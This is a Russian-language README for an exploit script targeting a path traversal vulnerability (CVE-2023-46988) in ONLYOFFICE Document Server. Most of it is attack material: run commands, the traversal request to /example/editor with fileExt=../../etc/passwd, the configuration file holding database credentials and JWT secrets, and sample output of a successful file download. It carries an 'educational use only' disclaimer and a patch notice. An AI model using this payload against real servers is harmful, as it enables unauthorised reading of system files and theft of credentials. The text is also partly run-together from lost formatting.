
CVE-2023-46988: эксплойт обхода пути в ONLYOFFICE
Этот скрипт эксплуатирует уязвимость обхода пути в ONLYOFFICE Document Server (CVE-2023-46988), которая позволяет неавторизованным пользователям копировать произвольные файлы с сервера. Уязвимость существует в конечной точке /example/editor, где параметр fileExt может быть изменён для доступа к чувствительным системным и конфигурационным файлам.
Этот инструмент предназначен только для образовательных и авторизованных исследований безопасности.
Несанкционированное использование против систем без явного разрешения незаконно и неэтично.
/etc/passwd/etc/onlyoffice/documentserver/local.json (содержит учётные данные БД и JWT-секреты)--file.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Это позволяет получить:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor с вредоносным параметром fileExt:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<extracted_filename>.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE исправила эту уязвимость в обновлении за февраль 2024 года.
Пользователям следует обновиться до последней версии, чтобы защитить свои серверы.
Этот проект распространяется под лицензией MIT – подробности см. в файле LICENSE.